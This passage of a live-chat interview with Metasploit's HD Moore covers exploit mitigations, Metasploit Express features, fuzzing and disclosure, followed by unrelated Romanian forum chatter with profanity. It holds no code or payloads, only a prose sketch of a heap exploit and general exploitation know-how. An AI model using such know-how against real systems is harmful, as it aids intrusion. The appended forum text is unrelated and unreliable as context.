NX, DEP, ASLR, etc)? is it going to be easier to bypass those security controls? Taking into consideration Skape and others are now in the defensive side. HD_Moore: Skape and his work on SEHOP basically killed SEH overwrites. NX, DEP, and ASLR all make things more difficult, as does the slow migration to 64-bit architectures. We are going to see more attacks against third-party applications missing these protections and much more complicated and potentially less reliable exploits for client-side applications. Over the long term, I think that memory corruption flaws will eventually be focused on embedded devices and consumer electronics, with input validation, logic bugs, and social engineering attacks becoming the norm. danuxx: CANVAS/Core Impact delivers ready to use exploits one day- to one week of delay from discovery. Does Metasploit express will get the resources to do that? HD_Moore: Metasploit Express has the ability to update within the product; it uses the same exploits and payloads that commit to the Metasploit Framework. Currently, Metasploit has support for over 550 exploits, which is pretty competitive with the commercial offerings today. We do not see exploit coverage as a differentiator for the Express product and will continue to add exploits as we write them to the free tree. The update frequency for Express is still being defined, but weekly would give us enough time for QA and should be doable. . 1epi: Who is working on exploit dev on metasploit express ? HD_Moore: Exploit development in the Express product is exactly the same as exploit development in the open source framework. Joshua Drake manages the exploit development process in Metasploit as a Rapid7 employee and we continue to receive contributions from around the world; which are all reviewed and sanitized by the core team brianT: Besides a strong passion for what you do what else do you credit for your success? HD_Moore: Lack of a social life and a very understanding wife me: Can you send me instructions on getting Metasploit Express (or even Metasploit) running on my Droid HD_Moore: Express would not be supported directly on the droid, however you can install Express on a remote server and access the web interface from any mobile device supporting SSL and javascript. The interface works just fine on the iPhone and the n900. Running the open source framework on the droid should possible if you root it and install native Ruby; we are working on jRuby support, but its not ready for production use yet offroad99ff: Are you involved in any other open source development projects? HD_Moore: I wish I was - I am way behind on WarVOX development and haven't had time to significantly contribute to other projects over the last year. Raaka: HD: GP-Gpu's (Nvidia 470 or Geforce 9000 series or Nforce 790SLi motherboards etc) are getting cheap does it make any deffence in exploit development\ application security? becasue the developers are choosing to use CUDA using 100's of cores HD_Moore: I think we are starting to reach the point where GPU technology (and more importantly, compilers that don't require refactoring) are starting to change the economics of consumer level high-performance computing. Security algorithms that depend on raw computing power alone (the WPA hashing routine) are going to be hurt the worst; but I look forward to the day that trivial hashes are just a GPU lookup to crack JimK: I just heard about Metasploit Express. Can you talk about what features it has re report generation? HD_Moore: Metasploit Express uses a backend database to store the results of every action and the state of the target network. The reporting capabilities are split between "live reports" and "generated reports"; the live reports let you generate a report at any state of the penetration test. If you simply want to scan for live hosts and report it, just use the Scan feature and go print out a report. If you want to show the screenshots and audit logs of all of the systems you compromised, the detailed audit report covers this. The generated report types include Word and PDF; these are static once generated and do no change based on the state of the test. We also support generating XML and ZIP reports, which contain a full XML schema for building your own reports or integrating into third-party tools. Finally, we have a report type called "Replay" which exports a ZIP file containing Metasploit Console resource scripts - these can be plugged into the free framework to reproduce every successful exploit in Express on a separate system, allowing you to give your client a way free value-add for reproducing your test results. Darren: What is the relationship with the folks over at Offensive-Security and any idea if we can expect to see more "Unleashed" documentation. HD_Moore: We have a friendly relationship with the Offensive Security folks, but nothing formalized. The Metasploit Unleashed is a great resource and we hope they continue to update it. danuxx: which has been the more challenging exploit that you have developed? HD_Moore: I would split this into two categories; the ones where my skill level was severely lacking (my first exploit for the Apache chunk encoding bug took months to make reliable) and expoits where the exploit conditions are really tough. My favorite exploit is a bug in a CA product where the product would dereference a random heap pointer. By sending repeated requests that triggered an exception, the heap would never be freed, and eventually the memory address used to store the incoming request would align with the random corrupted heap pointer, leading to code execution. thew00: what made you started doing on what you do now? HD_Moore: I have always liked breaking things; software is fun because you can keep breaking the same product over and over again without having to bust out the crazy glue. These days its still about breaking things; its just highly automated and methodical t0futim: has your position on ethical disclosure changed over the last 3 years? if so, how? HD_Moore: My view on disclosure hasn't changed much since I got started - my personal view is that the fastest way to fix something is to publish information about it. ryanaraine: What OS/browser combo do you personally use? And why? HD_Moore: Is Ryan tuning his exploits? He already has me running a Java chat client, what else does he need? (I am actually using Windows 7 64-bit and Firefox; but I spend 90% of my time inside one of the 10 VMs I have running) danuxx: Which is the methodology you used to find bugs? do you use SPIKE for fuzzing? HD_Moore: I try to strike a balance between reversing engineering and fuzzing - dissect a product just enough to figure out where requests are processed and what types of inputs may cause problems, then write a specific fuzzer to target that. I wrote most of the fuzzer modules in Metasploit, which can give you some idea about my approach (modules/auxiliary/fuzzers/) Dennis_fisher: We're just about out of time. Thanks everyone for joining the chat, and HUGE thanks to HD for his time today. Thanks and we'll see everyone next month for our next live chat! Q&A: HD Moore | threatpost //cica is si eu pacolo undeva

Multam. @Xander am 3, una tin pentru "urgente".

cand ajungi la 20 de posturi de calitate primesti de la mine.

@yceman_yceman imi pare sincer rau frate, ziua mea a fost bestiala (dae stie mai multe ))))) ) @life sucks... so FUCK IT! )))))))))) fuck it twice around, in diferent places, within 2 hours, it's much better. ) o zi groaznica : m-am trezit cu un prieten, pe un camp, la 50 km de orasul meu, la 2 pasi de liniile de tren. pula stia cum am ajuns acolo, bine ca am dat de o strada si am prins un camion dupa vreo 2 ore de umblat pe langa sine.

nu inteleg, cand apare versiunea oficiala de RSTcore ? daca vrei iti dau versiunea de testare.

multam, pana la urma va fi un fel de blog personal, nu voi posta doar RSTcore